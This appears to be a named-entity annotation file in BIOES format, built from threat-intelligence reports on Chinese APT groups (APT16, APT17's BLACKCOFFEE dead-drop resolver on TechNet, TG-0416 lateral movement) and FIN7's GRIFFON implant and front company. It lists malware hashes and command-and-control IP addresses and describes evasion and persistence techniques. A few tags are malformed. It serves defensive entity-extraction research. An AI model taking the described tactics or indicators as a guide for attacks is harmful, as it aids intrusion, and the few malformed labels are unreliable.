+China S-LOC
+based O
+threat O
+groups O
+. O
+
+The O
+difference O
+in O
+sponsorship O
+could O
+be O
+the O
+result O
+of O
+tasking O
+systems O
+that O
+allocate O
+targeting O
+responsibility O
+to O
+different O
+groups O
+based O
+on O
+their O
+targets O
+’ O
+geographic O
+location O
+. O
+
+In O
+other O
+words O
+, O
+while O
+media O
+organizations O
+are O
+important O
+targets O
+, O
+it O
+is O
+possible O
+that O
+two O
+separate O
+groups O
+are O
+responsible O
+for O
+Hong B-LOC
+Kong E-LOC
+and O
+Taiwan S-LOC
+, O
+respectively O
+. O
+
+The O
+suspected O
+APT16 S-APT
+targeting O
+of O
+the O
+Taiwanese B-IDTY
+government E-IDTY
+agency O
+– O
+in O
+addition O
+to O
+the O
+Taiwanese O
+media O
+organizations O
+– O
+further O
+supports O
+this O
+possibility O
+. O
+
+IRONHALO S-MAL
+: O
+CVE-2015-1701 S-VULID
+. O
+
+ELMER S-MAL
+: O
+CVE-2015-1701 S-VULID
+. O
+
+These O
+clusters O
+of O
+activity O
+raise O
+interesting O
+questions O
+about O
+the O
+use O
+of O
+an O
+identical O
+silently-patched O
+vulnerability O
+, O
+possibly O
+by O
+multiple O
+threat O
+groups O
+. O
+
+Both O
+Japan S-LOC
+and O
+Taiwan S-LOC
+are O
+important O
+intelligence O
+collection O
+targets O
+for O
+China S-LOC
+, O
+particularly O
+because O
+of O
+recent O
+changes O
+to O
+Japan S-LOC
+’s O
+pacifist O
+constitution O
+and O
+the O
+upcoming O
+Taiwanese O
+election O
+. O
+
+Based O
+on O
+our O
+visibility O
+and O
+available O
+data O
+, O
+we O
+only O
+attribute O
+one O
+campaign O
+to O
+the O
+Chinese O
+APT O
+group O
+APT16 S-APT
+. O
+
+
+APT17 S-APT
+. O
+
+FireEye S-SECTEAM
+Threat O
+Intelligence O
+and O
+the O
+Microsoft S-IDTY
+Threat O
+Intelligence O
+Center O
+investigated O
+a O
+command-and-control S-TOOL
+( O
+C2 S-TOOL
+) O
+obfuscation O
+tactic O
+used O
+on O
+Microsoft S-IDTY
+’s O
+TechNet S-TOOL
+, O
+a O
+web O
+portal O
+for O
+IT O
+professionals O
+. O
+
+TechNet S-TOOL
+’s O
+security O
+was O
+in O
+no O
+way O
+compromised O
+by O
+this O
+tactic O
+, O
+which O
+is O
+likely O
+possible O
+on O
+other O
+message O
+boards O
+and O
+forums O
+. O
+
+FireEye S-SECTEAM
+Threat O
+Intelligence O
+assesses O
+that O
+APT17 S-APT
+, O
+a O
+China S-LOC
+based O
+threat O
+group O
+, O
+was O
+behind O
+the O
+attempt O
+. O
+
+Other O
+groups O
+have O
+used O
+legitimate O
+websites O
+to O
+host O
+C2 S-TOOL
+IP O
+address O
+in O
+the O
+past O
+. O
+
+APT17 S-APT
+was O
+embedding O
+the O
+encoded O
+C2 S-TOOL
+IP O
+address O
+for O
+the O
+BLACKCOFFEE S-MAL
+malware O
+in O
+legitimate O
+Microsoft S-IDTY
+TechNet S-TOOL
+profiles O
+pages O
+and O
+forum O
+threads O
+, O
+a O
+method O
+some O
+in O
+the O
+information O
+security O
+community O
+call O
+a O
+“ O
+dead O
+drop O
+resolver. O
+” O
+Encoding O
+the O
+IP O
+address O
+makes O
+it O
+more O
+difficult O
+to O
+identify O
+the O
+true O
+C2 S-TOOL
+address O
+for O
+network O
+security O
+professionals O
+. O
+
+Few O
+security O
+companies O
+have O
+publicly O
+discussed O
+this O
+tactic O
+. O
+
+After O
+discovering O
+the O
+BLACKCOFFEE S-MAL
+activity O
+, O
+the O
+FireEye-Microsoft S-SECTEAM
+team O
+encoded O
+a O
+sinkhole O
+IP O
+address O
+into O
+the O
+profile O
+pages O
+and O
+forum O
+threads O
+and O
+locked O
+the O
+accounts O
+to O
+prevent O
+the O
+threat O
+actors O
+from O
+making O
+any O
+changes O
+. O
+
+This O
+collaborative O
+approach O
+allowed O
+the O
+team O
+to O
+observe O
+the O
+malware O
+and O
+its O
+victims O
+. O
+
+Though O
+the O
+security O
+community O
+has O
+not O
+yet O
+broadly O
+discussed O
+this O
+technique O
+, O
+FireEye S-SECTEAM
+has O
+observed O
+other O
+threat O
+groups O
+adopting O
+these O
+measures O
+and O
+expect O
+this O
+trend O
+to O
+continue O
+on O
+other O
+community O
+sites O
+. O
+
+Today O
+, O
+FireEye S-SECTEAM
+released O
+Indicators O
+of O
+Compromise O
+( O
+IOCs O
+) O
+for O
+BLACKCOFFEE S-MAL
+and O
+Microsoft S-IDTY
+released O
+signatures O
+for O
+its O
+anti-malware O
+products O
+. O
+
+APT17 S-APT
+, O
+also O
+known O
+as O
+DeputyDog S-APT
+, O
+is O
+a O
+Chinabased O
+threat O
+group O
+that O
+FireEye S-SECTEAM
+Intelligence O
+has O
+observed O
+conducting O
+network O
+intrusions O
+against O
+U.S. S-LOC
+government O
+entities O
+, O
+the O
+defense O
+industry O
+, O
+law O
+firms O
+, O
+information O
+technology O
+companies O
+, O
+mining O
+companies O
+, O
+and O
+non-government O
+organizations O
+. O
+
+BLACKCOFFEE S-MAL
+’s O
+functionality O
+includes O
+uploading O
+and O
+downloading O
+files O
+; O
+creating O
+a O
+reverse O
+shell O
+; O
+enumerating O
+files O
+and O
+processes O
+; O
+renaming O
+, O
+moving O
+, O
+and O
+deleting O
+files O
+; O
+terminating O
+processes O
+; O
+and O
+expanding O
+its O
+functionality O
+by O
+adding O
+new O
+backdoor O
+commands O
+. O
+
+FireEye S-SECTEAM
+has O
+monitored O
+APT17 S-APT
+’s O
+use O
+of O
+BLACKCOFFEE S-MAL
+variants O
+since O
+2013 O
+to O
+masquerade O
+malicious O
+communication O
+as O
+normal O
+web O
+traffic O
+by O
+disguising O
+the O
+C2 S-TOOL
+communication O
+as O
+queries O
+to O
+web O
+search O
+engines O
+. O
+
+The O
+use O
+of O
+BLACKCOFFEE S-MAL
+demonstrates O
+threat O
+actors O
+’ O
+evolving O
+use O
+of O
+public O
+websites O
+to O
+hide O
+in O
+plain O
+sight O
+. O
+
+In O
+the O
+past O
+, O
+threat O
+actors O
+would O
+modify O
+easily O
+compromised O
+websites O
+to O
+host O
+C2 S-TOOL
+commands O
+and O
+configuration O
+, O
+as O
+observed O
+in O
+the O
+China S-LOC
+based O
+APT1 S-APT
+’s O
+WEBC2 S-MAL
+suite O
+of O
+backdoors O
+. O
+
+Now O
+, O
+threat O
+actors O
+are O
+using O
+well-known O
+websites—that O
+they O
+do O
+not O
+need O
+to O
+compromise O
+to O
+host O
+C2 S-TOOL
+IP O
+addresses O
+. O
+
+They O
+simply O
+use O
+the O
+website O
+for O
+legitimate O
+purposes O
+, O
+such O
+as O
+posting O
+forum O
+threads O
+or O
+creating O
+profile O
+pages O
+. O
+
+APT17 S-APT
+went O
+further O
+to O
+obfuscate O
+their O
+C2 S-TOOL
+IP O
+address O
+and O
+employed O
+a O
+multi-layered O
+approach O
+for O
+the O
+malware O
+to O
+finally O
+beacon O
+the O
+true O
+C2 S-TOOL
+IP O
+. O
+
+They O
+used O
+legitimate O
+infrastructure—the O
+ability O
+to O
+post O
+or O
+create O
+comments O
+on O
+forums O
+and O
+profile O
+pages—to O
+embed O
+a O
+string O
+that O
+the O
+malware O
+would O
+decode O
+to O
+find O
+and O
+communicate O
+with O
+the O
+true O
+C2 S-TOOL
+IP O
+address O
+. O
+
+This O
+additional O
+obfuscation O
+puts O
+yet O
+another O
+layer O
+between O
+APT17 S-APT
+and O
+the O
+security O
+professionals O
+attempting O
+to O
+chase O
+them O
+down O
+. O
+
+This O
+BLACKCOFFEE S-MAL
+variant O
+contains O
+one O
+or O
+more O
+URLs O
+that O
+link O
+to O
+the O
+biography O
+sections O
+of O
+attacker-created O
+profiles O
+as O
+well O
+as O
+forum O
+threads O
+that O
+contain O
+comments O
+from O
+those O
+same O
+profiles O
+. O
+
+A O
+URL O
+is O
+randomly O
+selected O
+and O
+the O
+malware O
+searches O
+at O
+that O
+location O
+for O
+an O
+encoded O
+IP O
+address O
+located O
+between O
+two O
+tags O
+, O
+“ O
+@MICR0S0FT O
+” O
+and O
+“ O
+C0RP0RATI0N O
+” O
+. O
+
+The O
+malware O
+then O
+communicates O
+directly O
+with O
+the O
+retrieved O
+and O
+decoded O
+IP O
+address O
+to O
+receive O
+commands O
+and O
+send O
+stolen O
+information O
+. O
+
+If O
+the O
+C2 S-TOOL
+server O
+is O
+discovered O
+or O
+shut O
+down O
+, O
+the O
+threat O
+actors O
+can O
+update O
+the O
+encoded O
+IP O
+address O
+on O
+TechNet S-TOOL
+to O
+maintain O
+control O
+of O
+the O
+victims O
+’ O
+machines O
+. O
+
+BLACKCOFFEE S-MAL
+supports O
+an O
+initial O
+set O
+of O
+fifteen O
+commands O
+, O
+including O
+creating O
+a O
+reverse O
+shell O
+, O
+uploading O
+and O
+downloading O
+files O
+, O
+and O
+enumerating O
+files O
+and O
+processes O
+. O
+
+The O
+attackers O
+can O
+also O
+extend O
+BLACKCOFFEE S-MAL
+’s O
+functionality O
+through O
+additional O
+commands O
+sent O
+as O
+shellcode O
+. O
+
+APT17 S-APT
+: O
+de56eb5046e518e266e67585afa34612 S-MD5
+. O
+
+APT17 S-APT
+: O
+195ade342a6a4ea0a58cfbfb43dc64cb S-MD5
+. O
+
+APT17 S-APT
+: O
+4c21336dad66ebed2f7ee45d41e6cada S-MD5
+. O
+
+APT17 S-APT
+: O
+0370002227619c205402c48bde4332f6 S-MD5
+. O
+
+APT17 S-APT
+: O
+ac169b7d4708c6fa7fee9be5f7576414 S-MD5
+. O
+
+APT17 S-APT
+: O
+130.184.156.62 S-IP
+. O
+
+APT17 S-APT
+: O
+69.80.72.165 S-IP
+. O
+
+APT17 S-APT
+: O
+110.45.151.43 S-IP
+. O
+
+APT17 S-APT
+: O
+121.101.73.231 S-IP
+. O
+
+
+APT18 S-APT
+. O
+
+Dell B-SECTEAM
+SecureWorks I-SECTEAM
+Counter I-SECTEAM
+Threat I-SECTEAM
+Unit E-SECTEAM
+( O
+CTU S-SECTEAM
+) O
+analysts O
+were O
+recently O
+engaged O
+with O
+a O
+client O
+thought O
+to O
+have O
+been O
+compromised O
+by O
+a O
+threat O
+group O
+CTU S-SECTEAM
+researchers O
+have O
+named O
+Threat B-APT
+Group-0416 E-APT
+( O
+TG-0416 S-APT
+) O
+. O
+
+Various O
+artifacts O
+from O
+the O
+initial O
+phases O
+of O
+the O
+incident O
+provided O
+strong O
+indications O
+of O
+the O
+existence O
+of O
+this O
+particular O
+threat O
+group O
+within O
+the O
+client's O
+infrastructure O
+. O
+
+TG-0416 S-APT
+is O
+a O
+stealthy O
+and O
+extremely O
+successful O
+Advanced O
+Persistent O
+Threat O
+( O
+APT O
+) O
+group O
+known O
+to O
+target O
+a O
+broad O
+range O
+of O
+verticals O
+since O
+at O
+least O
+2009 O
+, O
+including O
+technology O
+, O
+industrial O
+, O
+manufacturing O
+, O
+human O
+rights O
+groups O
+, O
+government O
+, O
+pharmaceutical O
+, O
+and O
+medical O
+technology O
+. O
+
+The O
+threat O
+actors O
+achieved O
+an O
+initial O
+foothold O
+into O
+the O
+infrastructure O
+via O
+phishing B-TOOL
+email E-TOOL
+that O
+convinced O
+victims O
+to O
+install O
+the O
+Xyligan S-MAL
+remote O
+access O
+Trojan S-MAL
+( O
+RAT O
+) O
+on O
+a O
+system O
+. O
+
+The O
+threat O
+actors O
+then O
+installed O
+the O
+hcdLoader S-MAL
+RAT O
+, O
+which O
+installs O
+as O
+a O
+Windows S-OS
+service O
+and O
+provides O
+command O
+line O
+access O
+to O
+the O
+compromised O
+system O
+. O
+
+Using O
+host-based O
+digital O
+forensic O
+analysis O
+, O
+CTU S-SECTEAM
+analysts O
+observed O
+the O
+intruders O
+using O
+the O
+native O
+‘ O
+at.exe S-FILE
+’ O
+Windows S-OS
+task O
+scheduler O
+tool O
+to O
+move O
+laterally O
+within O
+the O
+infrastructure O
+. O
+
+Many O
+threat O
+groups O
+use O
+lateral O
+movement O
+techniques O
+, O
+but O
+this O
+engagement O
+allowed O
+CTU S-SECTEAM
+analysts O
+to O
+not O
+only O
+further O
+validate O
+indicators O
+of O
+lateral O
+movement O
+, O
+but O
+also O
+to O
+look O
+a O
+bit O
+closer O
+at O
+those O
+indicators O
+and O
+expand O
+the O
+cluster O
+of O
+indicators O
+surrounding O
+the O
+use O
+of O
+at.exe S-FILE
+for O
+lateral O
+movement O
+within O
+the O
+infrastructure O
+. O
+
+Threat O
+actors O
+accessed O
+the O
+source O
+host O
+via O
+the O
+hcdLoader S-MAL
+RAT O
+. O
+
+The O
+sole O
+indicator O
+on O
+the O
+source O
+host O
+that O
+at.exe S-FILE
+had O
+been O
+run O
+was O
+an O
+application O
+Prefetch O
+file O
+( O
+C:\Windows\Prefetch\AT.EXE-BB02E639.pf S-FILE
+) O
+that O
+was O
+created O
+when O
+the O
+tool O
+was O
+executed O
+. O
+
+Beyond O
+the O
+file O
+system O
+metadata O
+for O
+the O
+Prefetch S-TOOL
+file O
+( O
+creation O
+and O
+last O
+modification O
+times O
+) O
+and O
+the O
+last O
+execution O
+time O
+within O
+the O
+file O
+metadata O
+, O
+CTU S-SECTEAM
+analysts O
+did O
+not O
+observe O
+any O
+indicators O
+of O
+value O
+on O
+the O
+source O
+host O
+. O
+
+Two O
+files O
+are O
+created O
+for O
+the O
+task O
+at O
+approximately O
+the O
+same O
+time O
+: O
+C:\Windows\System32\Tasks\At1 O
+and O
+C:\Windows\Tasks\At1.job S-FILE
+. O
+
+The O
+first O
+file O
+is O
+an O
+Extensible B-TOOL
+Markup I-TOOL
+Language E-TOOL
+( O
+XML S-TOOL
+) O
+file O
+that O
+can O
+be O
+opened O
+and O
+viewed O
+in O
+a O
+text O
+editor O
+. O
+
+The O
+second O
+file O
+follows O
+a O
+decodable O
+binary O
+format O
+. O
+
+The O
+operating O
+system O
+also O
+creates O
+a O
+registry O
+key O
+within O
+the O
+software O
+registry O
+hive O
+that O
+is O
+specifically O
+associated O
+with O
+the O
+creation O
+of O
+the O
+scheduled O
+task O
+on O
+the O
+destination O
+host O
+: O
+Microsoft\Windows S-OS
+NT\CurrentVersion\Schedule\TaskCache\Tree\At1 O
+. O
+
+The O
+Task O
+Scheduler O
+service O
+names O
+the O
+tasks O
+, O
+so O
+subsequent O
+tasks O
+are O
+named O
+At2 O
+, O
+At3 O
+, O
+and O
+so O
+on O
+. O
+
+
+FIN7.5 S-APT
+: O
+the O
+infamous O
+cybercrime O
+rig O
+FIN7 S-APT
+continues O
+its O
+activities O
+. O
+
+On O
+August B-TIME
+1, I-TIME
+2018 E-TIME
+, O
+the O
+US S-LOC
+Department B-IDTY
+of I-IDTY
+Justice E-IDTY
+announced O
+that O
+it O
+had O
+arrested O
+several O
+individuals O
+suspected O
+of O
+having O
+ties O
+to O
+the O
+FIN7 S-APT
+cybercrime O
+rig O
+. O
+
+FIN7 S-APT
+operations O
+are O
+linked O
+to O
+numerous O
+intrusion O
+attempts O
+having O
+targeted O
+hundreds O
+of O
+companies O
+since O
+at O
+least O
+as B-TIME
+early I-TIME
+as I-TIME
+2015 E-TIME
+. O
+
+Interestingly O
+, O
+this O
+threat O
+actor O
+created O
+fake O
+companies O
+in O
+order O
+to O
+hire O
+remote O
+pentesters O
+, O
+developers O
+and O
+interpreters O
+to O
+participate O
+in O
+their O
+malicious O
+business O
+. O
+
+The O
+main O
+goal O
+behind O
+its O
+malicious O
+activities O
+was O
+to O
+steal O
+financial O
+assets O
+from O
+companies O
+, O
+such O
+as O
+debit O
+cards O
+, O
+or O
+get O
+access O
+to O
+financial O
+data O
+or O
+computers O
+of O
+finance O
+department O
+employees O
+in O
+order O
+to O
+conduct O
+wire O
+transfers O
+to O
+offshore O
+accounts O
+. O
+
+In O
+2018-2019 S-TIME
+, O
+researchers O
+of O
+Kaspersky B-SECTEAM
+Lab E-S-SECTEAM
+’s O
+Global B-SECTEAM
+Research I-SECTEAM
+and I-SECTEAM
+Analysis I-SECTEAM
+Team E-SECTEAM
+analyzed O
+various O
+campaigns O
+that O
+used O
+the O
+same O
+Tactics O
+Tools O
+and O
+Procedures O
+( O
+TTPs O
+) O
+as O
+the O
+historic O
+FIN7 S-APT
+, O
+leading O
+the O
+researchers O
+to O
+believe O
+that O
+this O
+threat O
+actor O
+had O
+remained O
+active O
+despite O
+the O
+2018 S-TIME
+arrests O
+. O
+
+In O
+addition O
+, O
+during O
+the O
+investigation O
+, O
+we O
+discovered O
+certain O
+similarities O
+to O
+other O
+attacker O
+groups O
+that O
+seemed O
+to O
+share O
+or O
+copy O
+the O
+FIN7 S-APT
+TTPs O
+in O
+their O
+own O
+operations O
+. O
+
+The O
+FIN7 S-APT
+intrusion O
+set O
+continued O
+its O
+tailored O
+spear B-ACT
+phishing E-ACT
+campaigns O
+throughout O
+last B-TIME
+year E-TIME
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+has O
+been O
+able O
+to O
+retrieve O
+some O
+of O
+these O
+exchanges O
+from O
+a O
+FIN7 S-APT
+target O
+. O
+
+The O
+spear B-ACT
+phishing E-ACT
+campaigns O
+were O
+remarkably O
+sophisticated O
+from O
+a O
+social O
+engineering O
+perspective O
+. O
+
+In O
+various O
+cases O
+, O
+the O
+operators O
+exchanged O
+numerous O
+messages O
+with O
+their O
+victims O
+for O
+weeks O
+before O
+sending O
+their O
+malicious O
+documents O
+. O
+
+The O
+emails S-TOOL
+were O
+efficient O
+social-engineering O
+attempts O
+that O
+appealed O
+to O
+a O
+vast O
+number O
+of O
+human O
+emotions O
+( O
+fear O
+, O
+stress O
+, O
+anger O
+, O
+etc. O
+) O
+to O
+elicit O
+a O
+response O
+from O
+their O
+victims O
+. O
+
+One O
+of O
+the O
+domains O
+used O
+by O
+the O
+attackers O
+in O
+their O
+2018 S-TIME
+campaign O
+of O
+spear B-ACT
+phishing E-ACT
+contained O
+more O
+than O
+130 O
+email S-TOOL
+aliases O
+, O
+leading O
+us O
+to O
+think O
+that O
+more O
+than O
+130 O
+companies O
+had O
+been O
+targeted O
+by O
+the B-TIME
+end I-TIME
+of I-TIME
+2018 E-TIME
+. O
+
+We O
+have O
+seen O
+two O
+types O
+of O
+documents O
+sent O
+to O
+victims O
+in O
+these O
+spear B-ACT
+phishing E-ACT
+campaigns O
+. O
+
+The O
+first O
+one O
+exploits O
+the O
+INCLUDEPICTURE S-TOOL
+feature O
+of O
+Microsoft S-IDTY
+Word S-TOOL
+to O
+get O
+context O
+information O
+about O
+the O
+victim’s O
+computer O
+, O
+and O
+the O
+availability O
+and O
+version O
+number O
+of O
+Microsoft S-IDTY
+Word S-TOOL
+. O
+
+The O
+second O
+one O
+, O
+which O
+in O
+many O
+cases O
+is O
+an O
+Office S-TOOL
+document O
+protected O
+with O
+a O
+trivial O
+password O
+, O
+such O
+as O
+“ O
+12345 O
+” O
+, O
+“ O
+1234 O
+” O
+, O
+etc. O
+, O
+uses O
+macros S-TOOL
+to O
+execute O
+a O
+GRIFFON S-MAL
+implant O
+on O
+the O
+target’s O
+computer O
+. O
+
+In O
+various O
+cases O
+, O
+the O
+associated O
+macro S-TOOL
+also O
+scheduled O
+tasks O
+to O
+make O
+GRIFFON S-MAL
+persistent O
+. O
+
+Interestingly O
+, O
+following O
+some O
+open-source O
+publications O
+about O
+them O
+, O
+the O
+FIN7 S-APT
+operators O
+seems O
+to O
+have O
+developed O
+a O
+homemade O
+builder O
+of O
+malicious O
+Office S-TOOL
+document O
+using O
+ideas O
+from O
+ThreadKit S-MAL
+, O
+which O
+they O
+employed O
+during O
+the B-TIME
+summer I-TIME
+of I-TIME
+2018 E-TIME
+. O
+
+The O
+new O
+builder O
+inserts O
+random O
+values O
+in O
+the O
+Author O
+and O
+Company O
+metadata O
+fields O
+. O
+
+Moreover O
+, O
+the O
+builder O
+allows O
+these O
+to O
+modify O
+different O
+IOCs S-TOOL
+, O
+such O
+as O
+the O
+filenames O
+of O
+wscript.exe S-FILE
+or O
+sctasks.exe S-FILE
+copies O
+, O
+etc O
+. O
+
+The O
+GRIFFON S-MAL
+implant O
+is O
+a O
+lightweight O
+JScript S-TOOL
+validator-style O
+implant O
+without O
+any O
+persistence O
+mechanism O
+. O
+
+The O
+malware O
+is O
+designed O
+for O
+receiving O
+modules O
+to O
+be O
+executed O
+in-memory O
+and O
+sending O
+the O
+results O
+to O
+C2s O
+. O
+
+We O
+were O
+able O
+to O
+obtain O
+four O
+different O
+modules O
+during O
+the O
+investigation O
+. O
+
+The O
+first O
+module O
+downloaded O
+by O
+the O
+GRIFFON S-MAL
+malware O
+to O
+the O
+victim’s O
+computer O
+is O
+an O
+information-gathering O
+JScript S-TOOL
+, O
+which O
+allows O
+the O
+cybercriminals O
+to O
+understand O
+the O
+context O
+of O
+the O
+infected O
+workstation O
+. O
+
+This O
+module O
+mainly O
+relies O
+on O
+WMI S-TOOL
+and O
+Windows S-OS
+objects O
+to O
+deliver O
+results O
+, O
+which O
+will O
+be O
+sent O
+back O
+to O
+the O
+operators O
+. O
+
+Interestingly O
+, O
+more O
+than O
+20 O
+artifacts O
+are O
+retrieved O
+from O
+the O
+system O
+by O
+this O
+implant O
+during O
+the O
+reconnaissance O
+stage O
+, O
+from O
+the O
+date O
+and O
+time O
+of O
+operating O
+system O
+installation O
+and O
+membership O
+in O
+a O
+Windows S-OS
+domain O
+to O
+a O
+list O
+of O
+and O
+the O
+resolutions O
+of O
+the O
+workstation’s O
+monitors O
+. O
+
+The O
+second O
+module O
+is O
+used O
+by O
+the O
+operators O
+to O
+execute O
+an O
+obfuscated O
+PowerShell S-TOOL
+script O
+, O
+which O
+contains O
+a O
+Meterpreter S-TOOL
+downloader S-TOOL
+widely O
+known O
+as O
+“ O
+Tinymet S-TOOL
+“ O
+. O
+
+This O
+downloader S-TOOL
+, O
+seen O
+in O
+past O
+FIN7 S-APT
+campaigns O
+, O
+downloads O
+a O
+one-byte O
+XOR S-ENCR
+encrypted O
+( O
+eg. O
+with O
+the O
+key O
+equal O
+to O
+0x50 O
+or O
+0x51 O
+) O
+piece O
+of O
+meterpreter S-TOOL
+shellcode O
+to O
+execute O
+. O
+
+The O
+third O
+module O
+allows O
+the O
+operators O
+to O
+take O
+a O
+screenshot O
+of O
+the O
+remote O
+system O
+. O
+
+To O
+do O
+that O
+, O
+it O
+also O
+drops O
+a O
+PowerShell S-TOOL
+script O
+on O
+the O
+workstation O
+to O
+execute O
+. O
+
+The O
+script O
+executes O
+an O
+open-source O
+.NET S-FILE
+class O
+used O
+for O
+taking O
+a O
+screenshot O
+. O
+
+The O
+resulting O
+screenshot O
+is O
+saved O
+at O
+“ O
+%TMP%/image.png S-FILE
+” O
+, O
+sent O
+back O
+to O
+the O
+attackers O
+by O
+the O
+GRIFFON S-MAL
+implant O
+and O
+then O
+deleted O
+. O
+
+The O
+last O
+retrieved O
+module O
+is O
+a O
+persistence O
+module O
+. O
+
+If O
+the O
+victim O
+appears O
+valuable O
+to O
+the O
+attackers O
+, O
+a O
+GRIFFON S-MAL
+implant O
+installer S-TOOL
+is O
+pushed O
+to O
+the O
+victim’s O
+workstation O
+. O
+
+This O
+module O
+stores O
+another O
+instance O
+of O
+the O
+GRIFFON S-MAL
+implant O
+inside O
+the O
+registry O
+to O
+achieve O
+persistence O
+. O
+
+Here O
+is O
+a O
+PowerLinks S-TOOL
+style O
+method O
+used O
+by O
+the O
+attackers O
+to O
+achieve O
+persistence O
+and O
+execute O
+the O
+GRIFFON S-MAL
+implant O
+at O
+each O
+user O
+logon O
+. O
+
+The O
+new O
+GRIFFON S-MAL
+implant O
+is O
+written O
+to O
+the O
+hard O
+drive O
+before O
+each O
+execution O
+, O
+limiting O
+the O
+“ O
+file-less O
+” O
+aspect O
+of O
+this O
+method O
+. O
+
+Through O
+its O
+light O
+weight O
+and O
+modular O
+architecture O
+, O
+the O
+GRIFFON S-MAL
+implant O
+is O
+the O
+perfect O
+validator O
+. O
+
+Even O
+though O
+we O
+have O
+been O
+able O
+to O
+retrieve O
+four O
+different O
+modules O
+, O
+it O
+is O
+possible O
+that O
+the O
+FIN7 S-APT
+operators O
+have O
+more O
+modules O
+in O
+their O
+toolsets O
+for O
+achieving O
+their O
+objectives O
+on O
+the O
+victim’s O
+workstation O
+. O
+
+Attackers O
+make O
+mistakes O
+, O
+and O
+FIN7 S-APT
+are O
+no O
+exception O
+. O
+
+The O
+major O
+error O
+made O
+by O
+its O
+operators O
+allowed O
+us O
+to O
+follow O
+the O
+command O
+and O
+control O
+server O
+of O
+the O
+GRIFFON S-MAL
+implant O
+last B-TIME
+year E-TIME
+. O
+
+In O
+order O
+to O
+trick O
+blue O
+teams O
+and O
+other O
+DFIR S-TOOL
+analysts O
+, O
+the O
+operators O
+created O
+fake O
+HTTP S-PROT
+302 O
+redirection O
+to O
+various O
+Google S-IDTY
+services O
+on O
+their O
+C2s O
+servers O
+. O
+
+This O
+error O
+allowed O
+us O
+to O
+follow O
+the O
+infrastructure O
+week O
+by O
+week O
+, O
+until O
+an O
+individual O
+pushed O
+on O
+Twitter S-IDTY
+the O
+heuristic O
+to O
+track O
+their O
+C2 S-TOOL
+at O
+the B-TIME
+end I-TIME
+of I-TIME
+December I-TIME
+2018 E-TIME
+. O
+
+A O
+few O
+days O
+after O
+the O
+tweet O
+, O
+in O
+January B-TIME
+2019 E-TIME
+, O
+the O
+operators O
+changed O
+their O
+landing O
+page O
+in O
+order O
+to O
+prevent O
+this O
+type O
+of O
+tracking O
+against O
+their O
+infrastructure O
+. O
+
+During O
+the O
+investigation O
+related O
+to O
+the O
+GRIFFON S-MAL
+infrastructure O
+, O
+we O
+found O
+a O
+strange O
+overlap O
+between O
+the O
+WHOIS S-TOOL
+record O
+of O
+an O
+old O
+GRIFFON S-MAL
+C2 S-TOOL
+and O
+the O
+website O
+of O
+a O
+fake O
+company O
+. O
+
+According O
+to O
+the O
+website O
+, O
+that O
+domain O
+supposedly O
+belongs O
+to O
+a O
+legitimate O
+security O
+company O
+“ O
+fully O
+owned O
+by O
+the O
+Russian B-IDTY
+Government E-IDTY
+” O
+( O
+sic O
+. O
+) O
+and O
+having O
+offices O
+in O
+“ O
+Moscow S-LOC
+, O
+Saint B-LOC
+Petersburg E-LOC
+and O
+Yekaterinburg S-LOC
+” O
+, O
+but O
+the O
+address O
+says O
+the O
+company O
+is O
+located O
+in O
+Trump B-IDTY
+Tower E-IDTY
+, O
+in O
+New B-LOC
+York E-LOC
+. O
+
+Given O
+FIN7 S-APT
+’s O
+previous O
+use O
+of O
+false O
+security O
+companies O
+, O
+we O
+decided O
+to O
+look O
+deeper O
+into O
+this O
+one O
+. O
+
+As O
+we O
+were O
+looking O
+at O
+the O
+content O
+of O
+the O
+website O
+, O
+it O
+became O
+evident O
+that O
+almost O
+all O
+of O
+the O
+text O
+used O
+was O
+lifted O
+from O
+legitimate O
+security-company O
+websites O
+. O
+
+Phrases O
+and O
+sentences O
+were O
+borrowed O
+from O
+at O
+least O
+the O
+following O
+companies/sites O
+: O
+DKSec S-IDTY
+– O
+www.dksec.com S-DOM
+, O
+OKIOK S-IDTY
+– O
+www.okiok.com/services/tailored-solutions S-DOM
+, O
+MainNerve S-IDTY
+– O
+www.mainnerve.com S-DOM
+, O
+Datics S-IDTY
+– O
+www.datatics.com/cyber-security S-DOM
+, O
+Perspective B-IDTY
+Risk E-IDTY
+– O
+www.perspectiverisk.com S-DOM
+, O
+Synack S-IDTY
+– O
+https://www.synack.com/company S-DOM
+, O
+FireEye S-IDTY
+– O
+https://www.fireeye.com/services/penetration-testing.html S-URL
+. O
+
+This O
+company O
+seems O
+to O
+have O
+been O
+used O
+by O
+the O
+FIN7 S-APT
+threat O
+actor O
+to O
+hire O
+new O
+people O
+as O
+translators O
+, O
+developers O
+and O
+pentesters O
+. O
+
+During O
+our O
+research O
+, O
+we O
+found O
+various O
+job O
+advertisements O
+associated O
+with O
+the O
+company O
+on O
+freelance O
+and O
+remote-work O
+websites O
+. O
+
+While O
+tracking O
+numerous O
+threat O
+actors O
+on O
+a O
+daily O
+basis O
+during O
+the B-TIME
+final I-TIME
+days I-TIME
+of I-TIME
+2018 E-TIME
+and O
+at O
+the B-TIME
+beginning I-TIME
+of I-TIME
+2019 E-TIME
+, O
+we O
+discovered O
+various O
+activity O
+clusters O
+sharing O
+certain O
+TTPs O
+associated O
+with O
+the O
+FIN7 S-APT
+intrusion O
+set O
+. O
+
+The O
+link O
+between O
+these O
+threat O
+actors O
+and O
+FIN7 S-APT
+is O
+still O
+weak O
+, O
+but O
+we O
+decided O
+to O
+disclose O
+a O
+few O
+hints O
+regarding O
+these O
+in O
+this O
+blog O
+post O
+. O
+
+In O
+his O
+history O
+, O
+FIN7 S-APT
+has O
+overlapped O
+several O
+times O
+with O
+Cobalt S-MAL/EmpireMonkey S-MAL
+in O
+terms O
+of O
+TTPs O
+. O
+
+This O
+activity O
+cluster O
+, O
+which O
+Kaspersky O
+Lab O
+has O
+followed O
+for O
+a O
+few O
+years O
+, O
+uses O
+various O
+implants O
+for O
+targeting O
+mainly O
+banks O
+, O
+and O
+developers O
+of O
+banking O
+and O
+money O
+processing O
+software O
+solutions O
+. O
+
+At O
+the B-TIME
+end I-TIME
+of I-TIME
+2018 E-TIME
+, O
+the O
+cluster O
+started O
+to O
+use O
+not O
+only O
+CobaltStrike S-TOOL
+but O
+also O
+Powershell S-TOOL
+Empire S-TOOL
+in O
+order O
+to O
+gain O
+a O
+foothold O
+on O
+the O
+victims’ O
+networks O
+. O
+
+After O
+a O
+successful O
+penetration O
+, O
+it O
+uses O
+its O
+own O
+backdoors O
+and O
+the O
+CobaltStrike S-TOOL
+framework O
+or O
+Powershell S-TOOL
+Empire S-TOOL
+components O
+to O
+hop O
+to O
+interesting O
+parts O
+of O
+the O
+network O
+, O
